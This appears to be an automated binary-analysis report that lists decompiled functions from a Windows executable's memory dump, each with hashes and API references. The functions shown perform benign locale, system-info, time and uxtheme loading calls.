Instruction Fuzzy Hash: DF01F7B1608704EFD715EF659C229AF7BECD749714F62847FF404E26C1E67C59108418

Uniqueness

Uniqueness Score: -1.00%

Function 004065C4, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E004065C4(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x40662a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00404648( &_v20, 7,  &_v15);
				E0040303C(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00406631);
				return E004043D8( &_v20);
			}

0x004065cd
0x004065d2
0x004065d3
0x004065d8
0x004065db
0x004065ea
0x004065fa
0x00406605
0x00406610
0x00406610
0x00406616
0x00406619
0x0040661c
0x00406629

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040662A), ref: 004065EA

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 656cff1cba7d759951ef6a446e1646784d69cbbb368b8e65aadc3a6a06ea9375
Instruction ID: 24582e3abdb722a5f301aa242dee712632048699b19e588fb24a723516b99941
Opcode Fuzzy Hash: 656cff1cba7d759951ef6a446e1646784d69cbbb368b8e65aadc3a6a06ea9375
Instruction Fuzzy Hash: A6F0C830A04309AFEB05EFA1CC41A9EB37AFBC5714F41883AA510B76C0EBB92610C658

Uniqueness

Uniqueness Score: -1.00%

Function 00429DC8, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00429DC8(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}

0x00429dce
0x00429dd1
0x00429dd4
0x00429dd8
0x00429ddd
0x00429de3
0x00429de4
0x00429dee
0x00429e01
0x00429e0a
0x00429e12
0x00429e15
0x00429e15
0x00000000
0x00000000
0x00000000
0x00000000
0x00429df0
0x00429df0
0x00429df3
0x00429df5
0x00429df8
0x00429dfb
0x00429dfb
0x00000000
0x00429df0
0x00429e1c

APIs

GetSystemInfo.KERNEL32(?), ref: 00429DD8

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 5e2f2624044a32240e7566b92594acfb1dffa846b7424f25bef424e43b4a380f
Instruction ID: 5a237fac07845009f4f8ec86c24644310e80be9a72e05ab7953e6261f48075f9
Opcode Fuzzy Hash: 5e2f2624044a32240e7566b92594acfb1dffa846b7424f25bef424e43b4a380f
Instruction Fuzzy Hash: B4F09671E011199FCB14DF98D48489DB7B4FB66305B9142AAD404E7382EB74AE54C7C5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2D4, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C2D4(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E0040442C(_t10, _t18);
				}
				return E004044C8(_t10, _t5 - 1,  &_v260);
			}

0x0040c2df
0x0040c2e1
0x0040c2f9
0x00000000
0x0040c311
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C2F2

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e2a38c654fad3b4e6efe02a43aa545c26fc6c6b9a1f523559b18ceb72db4b18d
Instruction ID: 1e77536608864a37f64fe0a1a8f9f747dc091ed908a88cf74d547517d746a1a0
Opcode Fuzzy Hash: e2a38c654fad3b4e6efe02a43aa545c26fc6c6b9a1f523559b18ceb72db4b18d
Instruction Fuzzy Hash: D8E0927271021457D310A6A94C82EEA726C9798310F10437FBE09E73C2EEB49D8046ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040C320, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040C320(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}

0x0040c323
0x0040c324
0x0040c33a
0x0040c341
0x0040c33c
0x0040c33c
0x0040c33c
0x0040c347

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040DD36,00000000,0040DF4F,?,?,00000000,00000000), ref: 0040C333

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ec1090fa1e2e456b02f9cbd3040865e7c905817e4b997f7296a5e9ed8b6200f1
Instruction ID: 072b29b42b202bf044db22afaac70db5c53f3ea32f29db0e7d303ef2c0dd6531
Opcode Fuzzy Hash: ec1090fa1e2e456b02f9cbd3040865e7c905817e4b997f7296a5e9ed8b6200f1
Instruction Fuzzy Hash: 0BD05E6631D2506AE210529F2D85EBF5AACCBC97A0F10813EB988D7242D2249C0693B5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD8, Relevance: 1.5, APIs: 1, Instructions: 6
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD8() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear;
			}

0x0040acdc
0x0040ace8

APIs

GetLocalTime.KERNEL32 ref: 0040ACDC

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 8e4ca7561e72912d9e22cb76723d5aa4fa78e16197ffc9af2d9a726632b7f064
Instruction ID: d6c42b8bd36005bec1de40505e99cefee692518481bdf545af149528a61a9b8e
Opcode Fuzzy Hash: 8e4ca7561e72912d9e22cb76723d5aa4fa78e16197ffc9af2d9a726632b7f064
Instruction Fuzzy Hash: 15A0120840481101C54033180C0355430605801720FC4075468B8503E1E92D1230819B

Uniqueness

Uniqueness Score: -1.00%

Function 00432C10, Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00432C10(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x4bca4c; // 0x1c41924
				E00432A08(_t2);
				_push(_t111);
				_push(0x432fc3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x4bca48 =  *0x4bca48 + 1;
				if( *0x4bca44 == 0) {
					 *0x4bca44 = LoadLibraryA("uxtheme.dll");
					if( *0x4bca44 > 0) {
						 *0x4bc984 = GetProcAddress( *0x4bca44, "OpenThemeData");
						 *0x4bc988 = GetProcAddress( *0x4bca44, "CloseThemeData");
						 *0x4bc98c = GetProcAddress( *0x4bca44, "DrawThemeBackground");
						 *0x4bc990 = GetProcAddress( *0x4bca44, "DrawThemeText");
						 *0x4bc994 = GetProcAddress( *0x4bca44, "GetThemeBackgroundContentRect");
						 *0x4bc998 = GetProcAddress( *0x4bca44, "GetThemeBackgroundContentRect");
						 *0x4bc99c = GetProcAddress( *0x4bca44, "GetThemePartSize");
						 *0x4bc9a0 = GetProcAddress( *0x4bca44, "GetThemeTextExtent");
						 *0x4bc9a4 = GetProcAddress( *0x4bca44, "GetThemeTextMetrics");
						 *0x4bc9a8 = GetProcAddress( *0x4bca44, "GetThemeBackgroundRegion");
						 *0x4bc9ac = GetProcAddress( *0x4bca44, "HitTestThemeBackground");
						 *0x4bc9b0 = GetProcAddress( *0x4bca44, "DrawThemeEdge");
						 *0x4bc9b4 = GetProcAddress( *0x4bca44, "DrawThemeIcon");
						 *0x4bc9b8 = GetProcAddress( *0x4bca44, "IsThemePartDefined");
						 *0x4bc9bc = GetProcAddress( *0x4bca44, "IsThemeBackgroundPartiallyTransparent");
						 *0x4bc9c0 = GetProcAddress( *0x4bca44, "GetThemeColor");
						 *0x4bc9c4 = GetProcAddress( *0x4bca44, "GetThemeMetric");
						 *0x4bc9c8 = GetProcAddress( *0x4bca44, "GetThemeString");
						 *0x4bc9cc = GetProcAddress( *0x4bca44, "GetThemeBool");
						 *0x4bc9d0 = GetProcAddress( *0x4bca44, "GetThemeInt");
						 *0x4bc9d4 = GetProcAddress( *0x4bca44, "GetThemeEnumValue");
						 *0x4bc9d8 = GetProcAddress( *0x4bca44, "GetThemePosition");
						 *0x4bc9dc = GetProcAddress( *0x4bca44, "GetThemeFont");
						 *0x4bc9e0 = GetProcAddress( *0x4bca44, "GetThemeRect");
						 *0x4bc9e4 = GetProcAddress( *0x4bca44, "GetThemeMargins");
						 *0x4bc9e8 = GetProcAddress( *0x4bca44, "GetThemeIntList");
						 *0x4bc9ec = GetProcAddress( *0x4bca44, "GetThemePropertyOrigin");
						 *0x4bc9f0 = GetProcAddress( *0x4bca44, "SetWindowTheme");
						 *0x4bc9f4 = GetProcAddress( *0x4bca44, "GetThemeFilename");
						 *0x4bc9f8 = GetProcAddress( *0x4bca44, "GetThemeSysColor");
						 *0x4bc9fc = GetProcAddress( *0x4bca44, "GetThemeSysColorBrush");
						 *0x4bca00 = GetProcAddress( *0x4bca44, "GetThemeSysBool");
						 *0x4bca04 = GetProcAddress( *0x4bca44, "GetThemeSysSize");
						 *0x4bca08 = GetProcAddress( *0x4bca44, "GetThemeSysFont");
						 *0x4bca0c = GetProcAddress( *0x4bca44, "GetThemeSysString");
						 *0x4bca10 = GetProcAddress( *0x4bca44, "GetThemeSysInt");
						 *0x4bca14 = GetProcAddress( *0x4bca44, "IsThemeActive");
						 *0x4bca18 = GetProcAddress( *0x4bca44, "IsAppThemed");
						 *0x4bca1c = GetProcAddress( *0x4bca44, "GetWindowTheme");
						 *0x4bca20 = GetProcAddress( *0x4bca44, "EnableThemeDialogTexture");
						 *0x4bca24 = GetProcAddress( *0x4bca44, "IsThemeDialogTextureEnabled");
						 *0x4bca28 = GetProcAddress( *0x4bca44, "GetThemeAppProperties");
						 *0x4bca2c = GetProcAddress( *0x4bca44, "SetThemeAppProperties");
						 *0x4bca30 = GetProcAddress( *0x4bca44, "GetCurrentThemeName");
						 *0x4bca34 = GetProcAddress( *0x4bca44, "GetThemeDocumentationProperty");
						 *0x4bca38 = GetProcAddress( *0x4bca44, "DrawThemeParentBackground");
						 *0x4bca3c = GetProcAddress( *0x4bca44, "EnableTheming");
					}
				}
				_v5 =  *0x4bca44 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x432fca);
				_t6 =  *0x4bca4c; // 0x1c41924
				return E00432A10(_t6);
			}

0x00432c1a
0x00432c1f
0x00432c26
0x00432c27
0x00432c2c
0x00432c2f
0x00432c32
0x00432c3b
0x00432c4b
0x00432c50
0x00432c63
0x00432c75
0x00432c87
0x00432c99
0x00432cab
0x00432cbd
0x00432ccf
0x00432ce1
0x00432cf3
0x00432d05
0x00432d17
0x00432d29
0x00432d3b
0x00432d4d
0x00432d5f
0x00432d71
0x00432d83
0x00432d95
0x00432da7
0x00432db9
0x00432dcb
0x00432ddd
0x00432def
0x00432e01
0x00432e13
0x00432e25
0x00432e37
0x00432e49
0x00432e5b
0x00432e6d
0x00432e7f
0x00432e91
0x00432ea3
0x00432eb5
0x00432ec7
0x00432ed9
0x00432eeb
0x00432efd
0x00432f0f
0x00432f21
0x00432f33
0x00432f45
0x00432f57
0x00432f69
0x00432f7b
0x00432f8d
0x00432f9f
0x00432f9f
0x00432c50
0x00432fa7
0x00432fad
0x00432fb0
0x00432fb3
0x00432fb8
0x00432fc2

APIs

LoadLibraryA.KERNEL32(uxtheme.dll), ref: 00432C46
GetProcAddress.KERNEL32(00000000,OpenThemeData,uxtheme.dll,00000000,00432FC3), ref: 00432C5E
GetProcAddress.KERNEL32(00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,00000000,00432FC3), ref: 00432C70
GetProcAddress.KERNEL32(00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,00000000,00432FC3), ref: 00432C82
GetProcAddress.KERNEL32(00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,00000000,00432FC3), ref: 00432C94
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,00000000,00432FC3), ref: 00432CA6
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,00000000,00432FC3), ref: 00432CB8
GetProcAddress.KERNEL32(00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,00000000), ref: 00432CCA
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData), ref: 00432CDC
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData), ref: 00432CEE
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground), ref: 00432D00
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText), ref: 00432D12
GetProcAddress.KERNEL32(00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect), ref: 00432D24
GetProcAddress.KERNEL32(00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect), ref: 00432D36
GetProcAddress.KERNEL32(00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize), ref: 00432D48
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent), ref: 00432D5A
GetProcAddress.KERNEL32(00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics), ref: 00432D6C
GetProcAddress.KERNEL32(00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion), ref: 00432D7E
GetProcAddress.KERNEL32(00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground), ref: 00432D90
GetProcAddress.KERNEL32(00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge), ref: 00432DA2
GetProcAddress.KERNEL32(00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon), ref: 00432DB4
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined), ref: 00432DC6
GetProcAddress.KERNEL32(00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent), ref: 00432DD8
GetProcAddress.KERNEL32(00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor), ref: 00432DEA
GetProcAddress.KERNEL32(00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric), ref: 00432DFC
GetProcAddress.KERNEL32(00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString), ref: 00432E0E
GetProcAddress.KERNEL32(00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool), ref: 00432E20
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt), ref: 00432E32
GetProcAddress.KERNEL32(00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue), ref: 00432E44
GetProcAddress.KERNEL32(00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition), ref: 00432E56
GetProcAddress.KERNEL32(00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont), ref: 00432E68
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect), ref: 00432E7A
GetProcAddress.KERNEL32(00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins), ref: 00432E8C
GetProcAddress.KERNEL32(00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList), ref: 00432E9E
GetProcAddress.KERNEL32(00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin), ref: 00432EB0
GetProcAddress.KERNEL32(00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme), ref: 00432EC2
GetProcAddress.KERNEL32(00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename), ref: 00432ED4
GetProcAddress.KERNEL32(00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor), ref: 00432EE6
GetProcAddress.KERNEL32(00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush), ref: 00432EF8
GetProcAddress.KERNEL32(00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool), ref: 00432F0A
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize), ref: 00432F1C
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont), ref: 00432F2E
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString), ref: 00432F40
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt), ref: 00432F52
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive), ref: 00432F64
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed), ref: 00432F76
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground,00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme), ref: 00432F88
GetProcAddress.KERNEL32(00000000,EnableTheming,00000000,DrawThemeParentBackground,00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture), ref: 00432F9A

Strings

GetThemeBool, xrefs: 00432D9A
GetThemePartSize, xrefs: 00432CC2
GetThemeString, xrefs: 00432D88
IsThemeDialogTextureEnabled, xrefs: 00432F26
GetThemePosition, xrefs: 00432DD0
GetWindowTheme, xrefs: 00432F02
HitTestThemeBackground, xrefs: 00432D0A
GetThemeSysInt, xrefs: 00432ECC
EnableTheming, xrefs: 00432F92
GetThemeTextExtent, xrefs: 00432CD4
GetThemeBackgroundRegion, xrefs: 00432CF8
GetThemeInt, xrefs: 00432DAC
DrawThemeEdge, xrefs: 00432D1C
GetThemeSysString, xrefs: 00432EBA
DrawThemeBackground, xrefs: 00432C7A
GetThemeSysColor, xrefs: 00432E60
SetWindowTheme, xrefs: 00432E3C
GetThemeSysBool, xrefs: 00432E84
DrawThemeIcon, xrefs: 00432D2E
OpenThemeData, xrefs: 00432C56
GetThemeFilename, xrefs: 00432E4E
EnableThemeDialogTexture, xrefs: 00432F14
GetThemeColor, xrefs: 00432D64
GetThemeSysFont, xrefs: 00432EA8
GetThemeRect, xrefs: 00432DF4
GetThemeAppProperties, xrefs: 00432F38
GetThemeSysSize, xrefs: 00432E96
IsThemeActive, xrefs: 00432EDE
GetThemeBackgroundContentRect, xrefs: 00432C9E, 00432CB0
GetThemeFont, xrefs: 00432DE2
SetThemeAppProperties, xrefs: 00432F4A
GetThemeMargins, xrefs: 00432E06
uxtheme.dll, xrefs: 00432C41
DrawThemeParentBackground, xrefs: 00432F80
DrawThemeText, xrefs: 00432C8C
GetThemeTextMetrics, xrefs: 00432CE6
IsThemeBackgroundPartiallyTransparent, xrefs: 00432D52
